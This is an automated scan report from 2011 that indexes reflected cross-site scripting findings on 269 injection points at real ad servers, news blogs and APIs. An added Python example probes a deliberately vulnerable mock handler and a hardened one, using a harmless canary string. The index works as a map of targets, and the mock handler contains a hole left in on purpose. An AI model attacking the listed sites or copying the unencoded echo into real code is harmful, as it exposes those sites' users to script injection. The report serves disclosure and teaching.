DORK Report, Cross Site Scripting, 2-14-2011, XSS, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 08:58:26 CST 2011.

1. Cross-site scripting (reflected)
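
The entries below are an index only: each line names a request and, in brackets, the injection point at which the crawler saw its probe string come back unneutralised (a path segment, a named query parameter, or the name of an extra parameter the crawler invented). As an added illustration of what that check is and what CWE-79 looks like on an ad-serving style endpoint, the following is example code written for this page, not CloudScan's own crawler and not code from any site listed. The host `ads.example.invalid`, the handler functions and the `sz` size parameter are constructed stand-ins; the two handlers play the role of the remote server, one echoing request data verbatim and one validating and encoding it, so the probe runs offline.

```python
"""Reflected-XSS probe in the style of the crawler findings below (added
example; constructed handlers stand in for the remote ad server)."""
import html
import json
import re
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit

# Constructed sample target (hypothetical host, not one of the sites listed).
EXAMPLE_URL = "http://ads.example.invalid/adj/cm.dailymail/ron_052010?sz=728x90"


def _split(path, query):
    """Shared request parsing: path segments, sz value, unknown parameter names."""
    segs = path.strip("/").split("/")
    sz, extra = "300x250", []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "sz":
            sz = value
        else:
            extra.append(name)  # unknown NAMES are echoed for "debugging"
    return segs, sz, extra


def vulnerable_handler(path, query):
    """CWE-79: path, sz and unknown parameter names reach HTML/JS verbatim."""
    segs, sz, extra = _split(path, query)
    slot = "/".join(segs)
    return (
        "<html><body>\n"
        f'<script>var adSize = "{sz}"; var slot = "{slot}";</script>\n'
        f'<div class="debug">ignored: {", ".join(extra)}</div>\n'
        "</body></html>"
    )


SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_.\-]+")
SAFE_SIZE = re.compile(r"\d{1,4}x\d{1,4}")


def js_string(value):
    """JS string literal for use inside <script>: json.dumps escapes quotes and
    backslashes; '<' and '>' are escaped too so '</script>' cannot break out."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def hardened_handler(path, query):
    """Allow-lists path segments and sz, HTML-encodes anything else echoed."""
    segs, sz, extra = _split(path, query)
    if not all(SAFE_SEGMENT.fullmatch(s) for s in segs):
        return "<html><body>bad request</body></html>"
    if not SAFE_SIZE.fullmatch(sz):
        sz = "300x250"
    slot = "/".join(segs)
    return (
        "<html><body>\n"
        f"<script>var adSize = {js_string(sz)}; var slot = {js_string(slot)};</script>\n"
        f'<div class="debug">ignored: {html.escape(", ".join(extra))}</div>\n'
        "</body></html>"
    )


def probe_points(url):
    """One probe per path segment, per query parameter, plus an invented name."""
    parts = urlsplit(url)
    points = [("path", i) for i in range(len(parts.path.strip("/").split("/")))]
    points += [("param", k) for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    points.append(("name", None))
    return points


def build_request(url, point, payload):
    """(path, query) with the payload at the probe point.  The path is handed
    over already percent-decoded, as a server sees it; the query round-trips
    through urlencode/parse_qsl like a real request."""
    parts = urlsplit(url)
    segs = parts.path.strip("/").split("/")
    params = parse_qsl(parts.query, keep_blank_values=True)
    kind, which = point
    if kind == "path":
        segs[which] = payload
    elif kind == "param":
        params = [(k, payload if k == which else v) for k, v in params]
    else:
        params.append((payload, "1"))
    return "/" + "/".join(segs), urlencode(params)


def describe(point):
    """Label the probe point the way the report's bracketed annotations do."""
    kind, which = point
    if kind == "path":
        return f"REST URL parameter {which + 1}"
    if kind == "param":
        return f"{which} parameter"
    return "name of an arbitrarily supplied request parameter"


def scan(handler, url):
    """List every probe point whose canary returns with its metacharacters intact."""
    findings, base = [], url.split("?", 1)[0]
    for point in probe_points(url):
        # random canary plus the three characters that matter in HTML and JS contexts
        payload = "cs" + secrets.token_hex(3) + "<\"'"
        path, query = build_request(url, point, payload)
        if payload in handler(path, query):
            findings.append(f"{base} [{describe(point)}]")
    return findings


if __name__ == "__main__":
    print("\n".join(scan(vulnerable_handler, EXAMPLE_URL)))
    print("hardened:", scan(hardened_handler, EXAMPLE_URL))
```

Against the vulnerable handler `scan()` reports the three path segments, the `sz` parameter and the arbitrary parameter name, in the same wording as the index below; against the hardened handler it reports nothing. Two caveats when reading the list: a reflection proves only that input reaches the response unencoded, not that it executes in a given context, so each entry still needs the response context confirmed by hand; and entries such as `[callback parameter]` or `[cb parameter]` on `.js`/JSONP endpoints usually reflect into a JavaScript body rather than HTML, where exploitability depends on the response Content-Type and on whether the callback name is restricted to identifier characters, which a probe like the one above should also record.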

1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

1.10. http://a.rfihub.com/sed [pa parameter]

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.79. http://api.dimestore.com/viapi [id parameter]

1.80. http://api.echoenabled.com/v1/search [q parameter]

1.81. http://api.facebook.com/restserver.php [method parameter]

1.82. http://api.facebook.com/restserver.php [method parameter]

1.83. http://api.facebook.com/restserver.php [query parameter]

1.84. http://api.facebook.com/restserver.php [urls parameter]

1.85. http://api.js-kit.com/v1/count [q parameter]

1.86. http://ar.voicefive.com/b/rc.pli [func parameter]

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

1.107. http://bid.openx.net/json [c parameter]

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter]

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

1.171. http://ebay.adnxs.com/ttj [pt1 parameter]

1.172. http://ebay.adnxs.com/ttj [pt2 parameter]

1.173. http://ebay.adnxs.com/ttj [pt3 parameter]

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter]

1.175. http://event.adxpose.com/event.flow [uid parameter]

1.176. http://ib.adnxs.com/ab [cnd parameter]

1.177. http://ib.adnxs.com/ab [custom_macro parameter]

1.178. http://ib.adnxs.com/ptj [redir parameter]

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

1.188. http://js.revsci.net/gateway/gw.js [csid parameter]

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter]

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

1.192. http://kona5.kontera.com/KonaGet.js [l parameter]

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter]

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter]

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter]

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter]

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter]

1.200. http://mads.cbsnews.com/mac-ad [CID parameter]

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter]

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter]

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

1.208. http://mads.cbsnews.com/mac-ad [POS parameter]

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter]

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter]

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter]

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

1.233. http://odb.outbrain.com/utils/get [callback parameter]

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

1.239. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter]

1.240. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter]

1.241. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter]

1.242. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter]

1.243. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter]

1.244. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter]

1.245. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

1.246. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.247. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

1.248. http://r.turn.com/server/pixel.htm [fpid parameter]

1.249. http://r.turn.com/server/pixel.htm [sp parameter]

1.250. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter]

1.251. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

1.252. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

1.253. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]

1.254. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter]

1.255. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter]

1.256. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter]

1.257. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

1.258. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

1.259. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

1.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

1.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

1.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

1.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

1.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

1.265. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

1.266. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.267. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.268. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.269. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

